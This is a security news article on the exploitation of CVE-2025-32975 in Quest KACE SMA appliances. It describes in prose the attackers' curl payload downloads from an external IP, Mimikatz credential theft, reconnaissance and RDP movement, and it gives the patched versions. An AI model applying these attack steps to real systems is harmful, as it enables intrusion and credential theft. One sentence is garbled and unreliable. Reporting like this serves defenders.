Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems

Arctic Wolf says that threat actors may be taking advantage of a serious security hole in the Quest KACE Systems Management Appliance (SMA) This article explores used vulnerability administrative. . The cybersecurity company said that starting the week of March 9, 2026, it saw bad things happening in customer environments that were consistent with CVE-2025-32975 being used on unpatched SMA systems that were connected to the internet.

We don't know what the attack's ultimate goals are right now. CVE-2025-32975 (CVSS score: 10.0) is a vulnerability that lets attackers get around authentication and act like real users without having the right credentials. If someone took advantage of the flaw, they could take over all of the administrative accounts. Quest fixed the problem in May 2025.

According to Arctic Wolf, the bad guys used the vulnerability to take over administrative accounts and run remote commands to drop Base64-encoded payloads from an external server (216.126.225[.156]) using the curl command. The attackers who were not known then used "runkbot.exe," a background process that comes with the SMA Agent and is used to run scripts and manage installations, to make more administrative accounts. A PowerShell script also changed the Windows Registry, which could have been to make changes to the system configuration or to keep the changes.

The threat actors also did the following: used Mimikatz to steal credentials. Doing discovery and reconnaissance by listing logged-in users and administrator accounts and using the "net time" and "net group" commands.

Getting remote desktop protocol (RDP) access to backup infrastructure (Veeam, Veritas) and domain controllers. Administrators should apply the most recent updates and keep SMA instances off the internet to protect against the threat. Versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4) have all fixed the problem.